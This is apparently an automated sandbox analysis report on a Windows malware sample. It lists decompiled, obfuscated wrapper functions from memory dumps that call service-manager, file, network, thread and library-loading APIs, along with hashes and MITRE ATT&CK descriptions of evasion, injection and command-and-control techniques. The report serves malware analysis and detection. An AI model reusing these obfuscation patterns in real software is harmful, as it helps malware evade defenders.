Opcode ID: 1373000f67fd09352ab480020baae7fa00b59f1f2ab89e5c019d1be64afd4c0b
Instruction ID: 5839b01b1d4417e4b7e0e99f7e2e99d6acc2bc18416798357c08a8ae541b320b
Opcode Fuzzy Hash: 1373000f67fd09352ab480020baae7fa00b59f1f2ab89e5c019d1be64afd4c0b
Instruction Fuzzy Hash: 2C2138B6D00319EFEB48DFA4C84A8EEBBB4FB44314F108599E415A6291D3B85B50CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0481FE9D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E0481FE9D(void* __edx, intOrPtr _a4, intOrPtr _a8, int _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* __ecx;
				void* _t34;
				void* _t41;
				void* _t43;

				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(0);
				E04822523(_t34);
				_v32 = 0xfebeef;
				_v28 = 0x6b4d4f;
				_v24 = 0;
				_v20 = 0x72d4d3;
				_v20 = _v20 + 0x7ce2;
				_v20 = _v20 ^ 0x0072d8bc;
				_v16 = 0x618a6;
				_v16 = _v16 + 0x2ac;
				_v16 = _v16 ^ 0x00083b16;
				_v12 = 0x17740f;
				_v12 = _v12 + 0x9d82;
				_v12 = _v12 ^ 0x0012bdfc;
				_v8 = 0xba692b;
				_v8 = _v8 ^ 0x31422697;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0x0005552e;
				_push(0x21ce39be);
				_push(0xb53dc03);
				_push(_t42);
				_push(_t42);
				_t43 = 0x15;
				E04802309(_t43);
				_t41 = OpenSCManagerW(0, 0, _a16); // executed
				return _t41;
			}

0x0481fea4
0x0481fea9
0x0481feaa
0x0481fead
0x0481feb1
0x0481feb2
0x0481feb7
0x0481fec1
0x0481fec8
0x0481fecb
0x0481fed2
0x0481fed9
0x0481fee0
0x0481fee7
0x0481feee
0x0481fef5
0x0481fefc
0x0481ff03
0x0481ff0a
0x0481ff11
0x0481ff18
0x0481ff1c
0x0481ff2f
0x0481ff35
0x0481ff3a
0x0481ff3b
0x0481ff3e
0x0481ff3f
0x0481ff4c
0x0481ff52

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,04815191,?,?,?,?,?,?,?,?,?,?,0EB411AB), ref: 0481FF4C

Strings

OMk, xrefs: 0481FEC1

Memory Dump Source

Source File: 00000008.00000002.1189352214.0000000004801000.00000020.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000008.00000002.1189345400.0000000004800000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189386614.0000000004825000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189394029.0000000004827000.00000002.00000001.sdmp Download File

Similarity

API ID: ManagerOpen
String ID: OMk
API String ID: 1889721586-456170103
Opcode ID: d1e283b7febcfdf4bdf6f7a65a9942aadab0ed956acd7b7642cec6b73cd3d803
Instruction ID: 01f60557af7212139dfe42c36ccfab09bf77121fb4aa95366e2b140458911798
Opcode Fuzzy Hash: d1e283b7febcfdf4bdf6f7a65a9942aadab0ed956acd7b7642cec6b73cd3d803
Instruction Fuzzy Hash: 741113B2C0022CABEB51EFA9D94A8EFBFB4EF44318F108189E91466211D3F55B149B91

Uniqueness

Uniqueness Score: -1.00%

Function 0481199D, Relevance: 1.6, APIs: 1, Instructions: 71
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0481199D(void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, long _a20, long _a24, long _a28, long _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t55;
				void* _t68;
				signed int _t69;
				signed int _t70;

				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				E04822523(_t55);
				_v12 = 0xd4f63c;
				_v12 = _v12 >> 7;
				_v12 = _v12 << 0xf;
				_v12 = _v12 + 0xffffff46;
				_v12 = _v12 ^ 0xd4fb5fe8;
				_v8 = 0x967d18;
				_v8 = _v8 + 0xffffef98;
				_t69 = 0x14;
				_v8 = _v8 / _t69;
				_t70 = 0x4a;
				_v8 = _v8 / _t70;
				_v8 = _v8 ^ 0x000a0722;
				_v20 = 0x4653bc;
				_v20 = _v20 * 0x70;
				_v20 = _v20 ^ 0x1ec2604c;
				_v16 = 0x7577a9;
				_v16 = _v16 * 0x3c;
				_v16 = _v16 ^ 0x1b87e59a;
				E04802309(0x10a, _t70, _t70, 0xb484d458, _t70, 0x9c9047d0);
				_t68 = CreateFileW(_a4, _a24, _a28, 0, _a32, _a20, 0); // executed
				return _t68;
			}

0x048119a6
0x048119a7
0x048119aa
0x048119ad
0x048119b0
0x048119b3
0x048119b6
0x048119b9
0x048119bc
0x048119bf
0x048119c3
0x048119c4
0x048119c9
0x048119d3
0x048119d9
0x048119dd
0x048119e4
0x048119eb
0x048119f2
0x048119fe
0x04811a03
0x04811a0b
0x04811a13
0x04811a16
0x04811a1d
0x04811a30
0x04811a38
0x04811a3f
0x04811a4a
0x04811a4d
0x04811a60
0x04811a79
0x04811a7f

APIs

CreateFileW.KERNEL32(?,?,?,00000000,?,?,00000000), ref: 04811A79

Memory Dump Source

Source File: 00000008.00000002.1189352214.0000000004801000.00000020.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000008.00000002.1189345400.0000000004800000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189386614.0000000004825000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189394029.0000000004827000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8a2d25935346c61c613306e80470cb2899605f47af9ce82126dccb95390cfdca
Instruction ID: 663b7838cb98411a21ddfbf251f1420d19b3e81017a4dfe1e9e7fa810e505dd1
Opcode Fuzzy Hash: 8a2d25935346c61c613306e80470cb2899605f47af9ce82126dccb95390cfdca
Instruction Fuzzy Hash: C221047280021DBBDF05DF94CC098DEBFB6EF48314F108588F914A6260D3B29A619F90

Uniqueness

Uniqueness Score: -1.00%

Function 048230FB, Relevance: 1.6, APIs: 1, Instructions: 70
networkCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E048230FB(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, long _a16, intOrPtr _a20, void* _a24, intOrPtr _a32, intOrPtr _a36, signed int _a40, intOrPtr _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t57;
				signed int _t58;
				short _t63;

				_t63 = _a40;
				_push(_a48);
				_push(0);
				_push(_t63 & 0x0000ffff);
				_push(_a36);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E04822523(_t63 & 0x0000ffff);
				_a40 = 0x441dde;
				_a40 = _a40 | 0xef6c71fd;
				_a40 = _a40 + 0xffff46ca;
				_a40 = _a40 ^ 0xef65f1b7;
				_v16 = 0x4e992b;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0xa64ff1a5;
				_v12 = 0xdc7938;
				_t58 = 0x71;
				_v12 = _v12 / _t58;
				_v12 = _v12 << 5;
				_v12 = _v12 ^ 0x00369a6d;
				_v8 = 0xc2c26;
				_v8 = _v8 << 7;
				_v8 = _v8 << 3;
				_v8 = _v8 ^ 0x30b97202;
				E04802309(0x185, _t58, _t58, 0x3cfe7f69, _t58, 0xc0cf1a4);
				_t57 = InternetConnectW(_a24, _a4, _t63, 0, 0, _a16, 0, 0); // executed
				return _t57;
			}

0x04823102
0x04823106
0x0482310e
0x0482310f
0x04823110
0x04823113
0x04823116
0x04823117
0x0482311a
0x0482311d
0x04823120
0x04823123
0x04823126
0x04823129
0x0482312a
0x0482312b
0x04823130
0x0482313a
0x04823143
0x0482314a
0x04823151
0x04823158
0x0482315c
0x04823163
0x0482316f
0x04823177
0x0482317a
0x0482317e
0x04823185
0x0482318c
0x04823190
0x04823194
0x048231b4
0x048231ca
0x048231d1

APIs

InternetConnectW.WININET(?,00369A6D,?,00000000,00000000,?,00000000,00000000), ref: 048231CA

Memory Dump Source

Source File: 00000008.00000002.1189352214.0000000004801000.00000020.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000008.00000002.1189345400.0000000004800000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189386614.0000000004825000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189394029.0000000004827000.00000002.00000001.sdmp Download File

Similarity

API ID: ConnectInternet
String ID:
API String ID: 3050416762-0
Opcode ID: a94079c84f44fd79cf2d8e21410448fccbf556cf6765277f06ac4260a9b0b9f5
Instruction ID: 17a955f080098d2156567c0695bdafc42d667773b0aca30594852e1cccaca087
Opcode Fuzzy Hash: a94079c84f44fd79cf2d8e21410448fccbf556cf6765277f06ac4260a9b0b9f5
Instruction Fuzzy Hash: 30214A76900108BBDF01CFAACD49CDFBFB9EB89714F018189F91466220C3B59A60DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 048138CA, Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E048138CA(void* __ecx, intOrPtr _a8, _Unknown_base(*)()* _a12, void* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, intOrPtr _a40) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t44;
				void* _t54;
				signed int _t56;

				_push(_a40);
				_push(0);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(0);
				E04822523(_t44);
				_v8 = 0x81d8e3;
				_v8 = _v8 | 0x29cc6377;
				_t56 = 0x4e;
				_v8 = _v8 / _t56;
				_v8 = _v8 + 0xffff28cb;
				_v8 = _v8 ^ 0x008a8115;
				_v20 = 0x37a592;
				_v20 = _v20 | 0x4431b854;
				_v20 = _v20 ^ 0x44318d0b;
				_v16 = 0x83d7ad;
				_v16 = _v16 | 0x0c5d9c08;
				_v16 = _v16 ^ 0x0cde7e94;
				_v12 = 0xac61ec;
				_v12 = _v12 + 0xffff443d;
				_v12 = _v12 * 0x13;
				_v12 = _v12 ^ 0x0cbd13a0;
				E04802309(0x347, _t56, _t56, 0x49f4d21, _t56, 0x9c9047d0);
				_t54 = CreateThread(0, 0, _a12, _a16, 0, 0); // executed
				return _t54;
			}

0x048138d1
0x048138d6
0x048138d7
0x048138da
0x048138db
0x048138de
0x048138e1
0x048138e4
0x048138e7
0x048138ea
0x048138eb
0x048138ed
0x048138f2
0x048138fc
0x0481390a
0x04813912
0x04813915
0x0481391c
0x04813923
0x0481392a
0x04813931
0x04813938
0x0481393f
0x04813946
0x0481394d
0x04813954
0x04813967
0x0481396f
0x04813982
0x04813994
0x0481399a

APIs

CreateThread.KERNEL32(00000000,00000000,44318D0B,?,00000000,00000000), ref: 04813994

Memory Dump Source

Source File: 00000008.00000002.1189352214.0000000004801000.00000020.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000008.00000002.1189345400.0000000004800000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189386614.0000000004825000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189394029.0000000004827000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 4ee66b657200ea8511f1b49f91465a58aa226465ce330f2d495d8e9b8aa70771
Instruction ID: 0ed897bc72d59f17ef98e8f23608887a347e25c9dc897fa667242bafb3775df0
Opcode Fuzzy Hash: 4ee66b657200ea8511f1b49f91465a58aa226465ce330f2d495d8e9b8aa70771
Instruction Fuzzy Hash: E3211271801219BBCF15CFE9DD4A8DFBFB8FF09214F108588E918A2120D3B19A209FA1

Uniqueness

Uniqueness Score: -1.00%

Function 04802985, Relevance: 1.6, APIs: 1, Instructions: 58
memoryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E04802985(long __ecx, long __edx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t43;
				void* _t53;
				signed int _t55;
				long _t60;
				long _t61;

				_push(_a12);
				_t60 = __edx;
				_t61 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04822523(_t43);
				_v20 = 0x610f25;
				_v20 = _v20 ^ 0x98bdb346;
				_v20 = _v20 >> 3;
				_v20 = _v20 ^ 0x13199c72;
				_v16 = 0x24641b;
				_t55 = 0x72;
				_v16 = _v16 * 0x35;
				_v16 = _v16 ^ 0xfebd96de;
				_v16 = _v16 ^ 0xf931a9e3;
				_v12 = 0x6331a9;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 / _t55;
				_v12 = _v12 ^ 0x0006f398;
				_v8 = 0x8145a8;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 << 0xd;
				_v8 = _v8 + 0x8268;
				_v8 = _v8 ^ 0x0405b518;
				E04802309(_t55 + 0x5d, _t55, _t55, 0x9d19c04e, _t55, 0x9c9047d0);
				_t53 = RtlAllocateHeap(_a8, _t60, _t61); // executed
				return _t53;
			}

0x0480298d
0x04802990
0x04802992
0x04802994
0x04802997
0x0480299a
0x0480299b
0x0480299c
0x048029a1
0x048029ab
0x048029b4
0x048029b8
0x048029bf
0x048029cc
0x048029d3
0x048029d6
0x048029dd
0x048029e4
0x048029eb
0x048029f9
0x048029fc
0x04802a03
0x04802a0a
0x04802a0e
0x04802a12
0x04802a19
0x04802a31
0x04802a3e
0x04802a45

APIs

RtlAllocateHeap.NTDLL(F931A9E3,01AD2A76,65B9EDAF,?,?,?,?,?,?,?,?,00000000,229292B5), ref: 04802A3E

Memory Dump Source

Source File: 00000008.00000002.1189352214.0000000004801000.00000020.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000008.00000002.1189345400.0000000004800000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189386614.0000000004825000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189394029.0000000004827000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 138a33bbf657fc90b6a1f11ed01e494c992cf007267dd6aff1ee16601a01d635
Instruction ID: d3b505bddbd3724a2cb93ed725a62e3ba250eb319de1b92c8f0311f2a719a159
Opcode Fuzzy Hash: 138a33bbf657fc90b6a1f11ed01e494c992cf007267dd6aff1ee16601a01d635
Instruction Fuzzy Hash: B1215672C00209BBDF18DFA8C84A8DEBFB5FB41714F108198E814A6210D3B46B54DF90

Uniqueness

Uniqueness Score: -1.00%

Function 04817708, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 048177B6

Memory Dump Source

Source File: 00000008.00000002.1189352214.0000000004801000.00000020.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000008.00000002.1189345400.0000000004800000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189386614.0000000004825000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189394029.0000000004827000.00000002.00000001.sdmp Download File

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 793664888eb73d009d9e5b6ba31e7172053ff3348b2e2b85015c814eee7fae41
Instruction ID: 9ab171d125e20dfd55eb251c9a47f5fa240aaa670dc26a6c1be79083ff8d3a47
Opcode Fuzzy Hash: 793664888eb73d009d9e5b6ba31e7172053ff3348b2e2b85015c814eee7fae41
Instruction Fuzzy Hash: A71137B2D00209BBDB08DFA8C94A9AEBBB4FF44304F108589E814A7251D3B09B108F91

Uniqueness

Uniqueness Score: -1.00%

Function 0481A566, Relevance: 1.5, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0481A566(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t31;
				int _t39;

				_push(_a4);
				_push(__ecx);
				E04822523(_t31);
				_v20 = 0xa80c31;
				_v20 = _v20 * 0x6c;
				_v20 = _v20 ^ 0x46e6f799;
				_v16 = 0x35d7e6;
				_v16 = _v16 << 0xd;
				_v16 = _v16 ^ 0xbafefac0;
				_v12 = 0x55f9ae;
				_v12 = _v12 + 0xffffbfa6;
				_v12 = _v12 | 0xf8d2795e;
				_v12 = _v12 ^ 0xf8daa7f9;
				_v8 = 0xe46cfe;
				_v8 = _v8 ^ 0xeb94df75;
				_v8 = _v8 | 0xf69b0666;
				_v8 = _v8 ^ 0xfffa92dc;
				E04802309(0x148, __ecx, __ecx, 0x2237d547, __ecx, 0x9c9047d0);
				_t39 = FindCloseChangeNotification(_a4); // executed
				return _t39;
			}

0x0481a56c
0x0481a570
0x0481a571
0x0481a576
0x0481a58a
0x0481a58d
0x0481a594
0x0481a59b
0x0481a59f
0x0481a5a6
0x0481a5ad
0x0481a5b4
0x0481a5bb
0x0481a5c2
0x0481a5c9
0x0481a5d0
0x0481a5d7
0x0481a5f6
0x0481a601
0x0481a606

APIs

FindCloseChangeNotification.KERNEL32(F8DAA7F9), ref: 0481A601

Memory Dump Source

Source File: 00000008.00000002.1189352214.0000000004801000.00000020.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000008.00000002.1189345400.0000000004800000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189386614.0000000004825000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189394029.0000000004827000.00000002.00000001.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 2512bc8cf98a9556459c8d1695ff192ee3e01f460f93b2f36ca59e351fe401b9
Instruction ID: 17a5a4eea21d927f754e6a46e6d075f55b3430dcc27b2b7fef8eb9f6cbaf6b5e
Opcode Fuzzy Hash: 2512bc8cf98a9556459c8d1695ff192ee3e01f460f93b2f36ca59e351fe401b9
Instruction Fuzzy Hash: 1C1127B5C1030DFBCB18DFE8D88699EBBB4EF44304F108688A855A6260D3B16B148F91

Uniqueness

Uniqueness Score: -1.00%

Function 048117CB, Relevance: 1.3, APIs: 1, Instructions: 56
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E048117CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t44;
				int _t55;
				signed int _t57;
				WCHAR* _t62;

				_push(_a8);
				_t62 = __ecx;
				_push(_a4);
				_push(__ecx);
				E04822523(_t44);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x2c5dd9;
				_v28 = 0x29a411;
				_v16 = 0xb6013c;
				_v16 = _v16 >> 2;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x05bceb0d;
				_v12 = 0xa7496a;
				_t57 = 7;
				_v12 = _v12 * 0x55;
				_v12 = _v12 | 0x1a205192;
				_v12 = _v12 ^ 0x3fab9f8f;
				_v8 = 0xf5055a;
				_v8 = _v8 / _t57;
				_v8 = _v8 + 0xa16;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 ^ 0x1132ba81;
				_v20 = 0xaea409;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x2ba3ef66;
				E04802309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
				_t55 = lstrcmpiW(_t62, _a8); // executed
				return _t55;
			}

APIs

lstrcmpiW.KERNEL32(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 0481188D

Memory Dump Source

Source File: 00000008.00000002.1189352214.0000000004801000.00000020.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000008.00000002.1189345400.0000000004800000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189386614.0000000004825000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189394029.0000000004827000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction ID: 72c60534e6094683c5792b3000ef5ec03544eef77b0a9a61bc9febf1d4d51667
Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction Fuzzy Hash: 232115B5D0020DFBDB04DFA8C94A9EEBBB4EB44304F108189E425A7250E3B56B049F91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report MakbLShaqA

Overview

General Information

Detection

Signatures

Classification

Process Tree

